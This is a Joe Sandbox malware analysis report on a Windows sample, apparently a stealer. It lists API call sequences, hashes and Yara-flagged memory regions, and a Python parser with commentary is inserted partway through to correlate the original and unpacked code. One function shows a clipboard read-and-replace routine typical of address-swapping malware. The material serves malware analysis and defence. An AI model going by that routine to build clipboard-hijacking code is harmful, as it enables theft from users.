Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9f9000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID:
• API String ID: 4275171209-0
• Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction ID: 6f6d5a8ec73014d56f3bcff3e7fd30232263f24054d49edfb9c460e100f92e22
• Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
• Instruction Fuzzy Hash: 6C113F79A00208EFDB01DF98C985E98BFF5AF08350F058094FA489B361D371EA50DF90
APIs
• __EH_prolog3_GS.LIBCMT ref: 024C194D
• Sleep.KERNEL32(00001541), ref: 024C1957
  • Part of subcall function 024CCE77: _strlen.LIBCMT ref: 024CCE8E
• OpenClipboard.USER32(00000000), ref: 024C1984
• GetClipboardData.USER32(00000001), ref: 024C1994
• _strlen.LIBCMT ref: 024C19B0
• _strlen.LIBCMT ref: 024C19DF
• _strlen.LIBCMT ref: 024C1B23
• EmptyClipboard.USER32 ref: 024C1B39
• GlobalAlloc.KERNEL32(00000002,00000001), ref: 024C1B46
• GlobalUnlock.KERNEL32(00000000), ref: 024C1B70
• SetClipboardData.USER32(00000001,00000000), ref: 024C1B79
• GlobalFree.KERNEL32(00000000), ref: 024C1B80
• CloseClipboard.USER32 ref: 024C1BA4
• Sleep.KERNEL32(000002D2), ref: 024C1BAF
Strings
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
• String ID: 4#E$i
• API String ID: 4246938166-2480119546
• Opcode ID: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
• Instruction ID: 057a5989c295d24765feb738bdd01b02e28d24272a35bf8867de8e1746211f39
• Opcode Fuzzy Hash: 45a8dad81ff59b0f4b4464c7594e59c36273e081b3ff668940b9dbd8c87fe3c1
• Instruction Fuzzy Hash: 36510438C007949AE7119FA8ED457AD7774FF2A306F14522ED809A2173FB709681CB69
APIs
• NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 024C239C
• GetClientRect.USER32(?,?), ref: 024C23B1
• GetDC.USER32(?), ref: 024C23B8
• CreateSolidBrush.GDI32(00646464), ref: 024C23CB
• CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 024C23EA
• Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 024C240B
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 024C2416
• MulDiv.KERNEL32(00000008,00000000), ref: 024C241F
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 024C2443
• SetBkMode.GDI32(?,00000001), ref: 024C24CE
• _wcslen.LIBCMT ref: 024C24E6
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
• String ID:
• API String ID: 1529870607-0
• Opcode ID: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
• Instruction ID: dc9abca1d7b682c903aabf14d796d7761c011211d69c65ca613a68487233c5da
• Opcode Fuzzy Hash: b907d1a1b1e1ec1e10588b01c324950f76be5009d0317e1f7e1d34b68f08428a
• Instruction Fuzzy Hash: 9A71FF76900228AFDB62DF68DD85FAEB7BCEB09711F0041A9F509E6151DA70AF84CF10
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
• Instruction ID: 9e6dbbf50b3e3cea2dd72b1fc58d7ba5eae27dc46f9bc3f4d00a4e89d85e9552
• Opcode Fuzzy Hash: 1705c8ec1ca245728102af4e988fb3fc25a52218aafbc3cd1121bd07fbf397af
• Instruction Fuzzy Hash: 96C25B71E096288FDB25CE29DD407EAB7B5EB48304F1551EBD80DE7280E778AE818F45
APIs
• GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B807
• GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA8D,?,00000000), ref: 0043B830
• GetACP.KERNEL32(?,?,0043BA8D,?,00000000), ref: 0043B845
Strings
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: InfoLocale
• String ID: ACP$OCP
• API String ID: 2299586839-711371036
• Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
• Instruction ID: fa2a6f3f06b8257a5ac591d998b536fc1da73be0d13f1331aa64b533421ee897
• Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
• Instruction Fuzzy Hash: 4B21A136A00104AAD738DF14C801B9777AAEF98F50F669466EB0AD7311E736DE41C7D8
APIs
• GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,024FBCF4,?,00000000), ref: 024FBA6E
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,024FBCF4,?,00000000), ref: 024FBA97
                                                                                                                                                                                                                                                                    • GetACP.KERNEL32(?,?,024FBCF4,?,00000000), ref: 024FBAAC
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                                                                                                    • String ID: ACP$OCP
                                                                                                                                                                                                                                                                    • API String ID: 2299586839-711371036
                                                                                                                                                                                                                                                                    • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                    • Instruction ID: 288a1f027990ebf76b0392541bbb88d75f7ef192e0cdbe7723b3037dddc8a195
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7C219532E00304AAE7749F54D901BA772A6EBCAE1CB56C066EA0AD7204F732DA81C350
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA4E
                                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 0043BAA9
                                                                                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAB8
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,004307B5,00000040,?,004308D5,00000055,00000000,?,?,00000055,00000000), ref: 0043BB00
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,00430835,00000040), ref: 0043BB1F
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2287132625-0
                                                                                                                                                                                                                                                                    • Opcode ID: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                                                    • Instruction ID: d022b458b050368e3858f313ea430915e0084ddf9245bc07a5b1b9775f8f1cbc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 09e7077a585d70c8480d4b1d78da616f19cbc20ae15e0cb08ae98176a4c780fb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1516171A006059BEB10EFA5CC45BBF73B8FF4C701F14556BEA14E7290E7789A048BA9
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: _free.LIBCMT ref: 024F21A0
                                                                                                                                                                                                                                                                      • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21AD
                                                                                                                                                                                                                                                                    • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 024FBCB5
                                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000), ref: 024FBD10
                                                                                                                                                                                                                                                                    • IsValidLocale.KERNEL32(?,00000001), ref: 024FBD1F
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001001,024F0A1C,00000040,?,024F0B3C,00000055,00000000,?,?,00000055,00000000), ref: 024FBD67
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(?,00001002,024F0A9C,00000040), ref: 024FBD86
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2287132625-0
                                                                                                                                                                                                                                                                    • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                                    • Instruction ID: 7f37e6073a518e84179c4c1334e59d9c16c6f8ab6b38ff6aa6a1b7232299f209
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE519371900249ABEB51DFA5CC44ABF77B9EF9E708F04042FEA00E7290EB7196458B61
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID: C$C
                                                                                                                                                                                                                                                                    • API String ID: 0-238425240
                                                                                                                                                                                                                                                                    • Opcode ID: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                                                                                                                                                                                    • Instruction ID: c20898a9e1ba257a9a920a277c678998c6649ecb9dd7e2fb432374692491c933
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 185f0ef558908b44b9225c7828f32a07078ec648b0e05d0c62af8d2f3fb84e81
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D2025C71E002299BDF14CFAAD9806AEBBF1EF88314F65416AD919E7380D734A9418B94
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                      • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                    • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,004307BC,?,?,?,?,00430213,?,00000004), ref: 0043B0EC
                                                                                                                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0043B17C
                                                                                                                                                                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0043B18A
                                                                                                                                                                                                                                                                    • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,004307BC,00000000,004308DC), ref: 0043B22D
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
• String ID:
• API String ID: 2444527052-0
• Opcode ID: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
• Instruction ID: 51baba79e9d53baeee2bb674299bb26a4ab80324ce8bdae5682f18c88f981068
• Opcode Fuzzy Hash: 0931e6da1e5e69565e8d8cf9fe0bd78167b9118aed70e948f35c6624fe6e05f7
• Instruction Fuzzy Hash: 2A611871600305AADB25AB35DC46FAB73A8EF0C754F14142FFA15D7281EB78E90087E9
APIs
  • Part of subcall function 024F2141: GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
  • Part of subcall function 024F2141: _free.LIBCMT ref: 024F2178
  • Part of subcall function 024F2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
• IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,024F0A23,?,?,?,?,024F047A,?,00000004), ref: 024FB353
• _wcschr.LIBVCRUNTIME ref: 024FB3E3
• _wcschr.LIBVCRUNTIME ref: 024FB3F1
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,024F0A23,00000000,024F0B43), ref: 024FB494
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_free
• String ID:
• API String ID: 2444527052-0
• Opcode ID: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
• Instruction ID: edf2f6bc83b0d9fa1964e375e66873d598e0bd08c7bf10ffc40a8989b1ab2f83
• Opcode Fuzzy Hash: a8d3268dc8615bf56593139fe4b4cdd8dd771f7aacb6be947116ef161c46c3e3
• Instruction Fuzzy Hash: 25610971600206AAD764AF35DC45BBB73ADEF8E718F14402FEB09D7680EB74D5408BA0
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
  • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F39
  • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F46
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B49A
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B55A
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ErrorInfoLastLocale$_free
• String ID:
• API String ID: 2834031935-0
• Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
• Instruction ID: c49451ec2ca19e0a4411bfa9fc43b71b3add14360d4f89f5b475bf5440394a21
• Opcode Fuzzy Hash: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
• Instruction Fuzzy Hash: D561A771501207AFEB289F25CC82BBA77A8EF08714F10507BEE05CA681E77DD951CB99
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
• Instruction ID: 57e1c3994b5eabbb9df0cdc6b85fdffdc982c490f91e1a39e2279c764f1972c3
• Opcode Fuzzy Hash: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
• Instruction Fuzzy Hash: C231D6749112289BCB21DF64D9887CDB7B8BF08710F5042EAE81CA7250EB749F958F49
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,024CDAD7), ref: 024EA732
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,024CDAD7), ref: 024EA73C
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,024CDAD7), ref: 024EA749
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
• Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
• Instruction ID: 4649a0793cfd33ccb82e500e5141296872c2ac950f1a4b6450f9e6394cce389f
• Opcode Fuzzy Hash: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
• Instruction Fuzzy Hash: 2B31D4B490122C9BDB21DF64D98879DBBB8BF18711F5042EAE40CA7260EB309B858F45
APIs
• GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
• TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
• ExitProcess.KERNEL32 ref: 0042FE99
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
• Instruction ID: 8c82726c098bb25b52c6af08a7b8273a11ccbc153eb778ed9611e77f52f83783
• Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
• Instruction Fuzzy Hash: B3E04635100148ABCF126F50ED08A5A3B39FF09B56F810439F8068B236CB39EE42CA88
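The entries above list each function body twice, once from the PE-backed mapping at offset 00400000 and once from the non-PE-backed region at offset 024C0000 that carries the Yara matches, and the Process$CurrentExitTerminate body has the same Opcode ID in both dumps. The following Python script is an added example for this page, not part of the Joe Sandbox report: it parses these per-function summaries and pulls out the cross-region overlap and the direct call sites of a given API. The embedded SAMPLE is a constructed excerpt of the entries above, trimmed to the fields the parser reads; the field names (pe_backed, subcall) and the helpers shared_functions and callers_of are my own.

```python
"""Parse Joe Sandbox per-function summary entries and correlate the PE-backed
image with the non-PE-backed (unpacked) region by Opcode ID.
Added example for this report; field names and helpers are my own."""
import re

# Constructed excerpt of the report's entries, trimmed to the fields this parser
# reads; the last entry stops after its Opcode ID, as it does in the report.
SAMPLE = """\
APIs
  • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0043B449
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: ErrorInfoLastLocale$_free
• Opcode ID: b47dfc7cc7d128076792c5fbd0b190a68a95fbe03c58a2560eecab0ba078b5b3
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 0042A4CB
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 0042A4D5
• UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 0042A4E2
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• Opcode ID: e3c43158b2ba7ac08fb42c40ba6f83f67e70d04cde29a4d11da33e8c3fa8252c
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,024CDAD7), ref: 024EA732
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,024CDAD7), ref: 024EA73C
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,024CDAD7), ref: 024EA749
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• Opcode ID: eb826f4c1f6c2a36f22102285c1cba4b775e3ea8ac7ebf58b950a08133c1f654
APIs
• GetCurrentProcess.KERNEL32(00000003,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE80
• TerminateProcess.KERNEL32(00000000,?,0042FE35,00000003,00457970,0000000C,0042FF8C,00000003,00000002,00000000,?,0042DFBF,00000003), ref: 0042FE87
• ExitProcess.KERNEL32 ref: 0042FE99
Memory Dump Source
• Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• API ID: Process$CurrentExitTerminate
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
APIs
• GetCurrentProcess.KERNEL32(00000000,?,024F009C,00000000,00457970,0000000C,024F01F3,00000000,00000002,00000000), ref: 024F00E7
• TerminateProcess.KERNEL32(00000000,?,024F009C,00000000,00457970,0000000C,024F01F3,00000000,00000002,00000000), ref: 024F00EE
• ExitProcess.KERNEL32 ref: 024F0100
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Yara matches
• API ID: Process$CurrentExitTerminate
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
"""

# 'Name.MODULE(args), ref: ADDR' or 'Name.MODULE ref: ADDR', optionally prefixed
# with 'Part of subcall function CALLER: ' when the call sits in a callee.
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")
SRC_RE = re.compile(
    r"^Source File: (?P<dump>\S+), Offset: (?P<offset>[0-9A-Fa-f]+), "
    r"based on PE: (?P<pe>true|false)$")


def parse_entries(text):
    """One dict per function entry; an entry starts at an 'APIs' header."""
    entries, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = {"apis": [], "yara": False, "offset": None, "pe_backed": None}
            entries.append(cur)
            continue
        if cur is None:
            continue
        if line == "Yara matches":          # the report flags a Yara hit on this region
            cur["yara"] = True
            continue
        if not line.startswith("• "):       # section headers such as 'Memory Dump Source'
            continue
        body = line[2:]
        m = API_RE.match(body)
        if m:
            cur["apis"].append({"name": m["name"], "module": m["module"],
                                "ref": int(m["ref"], 16),
                                "subcall": m["caller"] is not None})
            continue
        m = SRC_RE.match(body)
        if m:
            cur["offset"] = int(m["offset"], 16)
            cur["pe_backed"] = m["pe"] == "true"
            continue
        key, _, value = body.partition(":")  # 'Opcode ID: ...', 'API ID: ...', ...
        cur[key.strip()] = value.strip()
    return entries


def shared_functions(entries):
    """Opcode IDs present in both a PE-backed mapping and a non-PE-backed region:
    the same code body in the original image and in the rewritten one."""
    pe, nonpe = set(), set()
    for e in entries:
        if "Opcode ID" in e and e["pe_backed"] is not None:
            (pe if e["pe_backed"] else nonpe).add(e["Opcode ID"])
    return sorted(pe & nonpe)


def callers_of(entries, api_name):
    """(region offset, call site) for every direct call to api_name, skipping
    calls the report attributes to a subcall."""
    return [(e["offset"], a["ref"]) for e in entries for a in e["apis"]
            if a["name"] == api_name and not a["subcall"]]
```

Read the output with the C runtime in mind: IsDebuggerPresent followed by SetUnhandledExceptionFilter and UnhandledExceptionFilter is the shape of the MSVC runtime's own fault-report path, GetCurrentProcess/TerminateProcess/ExitProcess is its process-exit helper, and the IsValidCodePage/GetLocaleInfoW/_wcschr group is its locale setup, so none of these triples is on its own a stealer-specific indicator. The detail worth pivoting on is that shared_functions returns the Process$CurrentExitTerminate body for both dumps while only the non-PE-backed region carries the Yara match, which is consistent with the report's unpacking verdict and gives you a known-good anchor when diffing the two regions.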
APIs
• GetCurrentProcess.KERNEL32(00000000,?,024F009C,00000000,00457970,0000000C,024F01F3,00000000,00000002,00000000), ref: 024F00E7
• TerminateProcess.KERNEL32(00000000,?,024F009C,00000000,00457970,0000000C,024F01F3,00000000,00000002,00000000), ref: 024F00EE
• ExitProcess.KERNEL32 ref: 024F0100
Memory Dump Source
• Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
Yara matches
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
                                                                                                                                                                                                                                                                    • Instruction ID: 3d41be2cb853779122c00ac3dc7a88bb26d3543edbedc78cf1a7c96cbfde6a7c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5e7a358d5f0fcd19f7a1f5c916dd47094927e45ce0fce04ddfdee5a2d3ebffdf
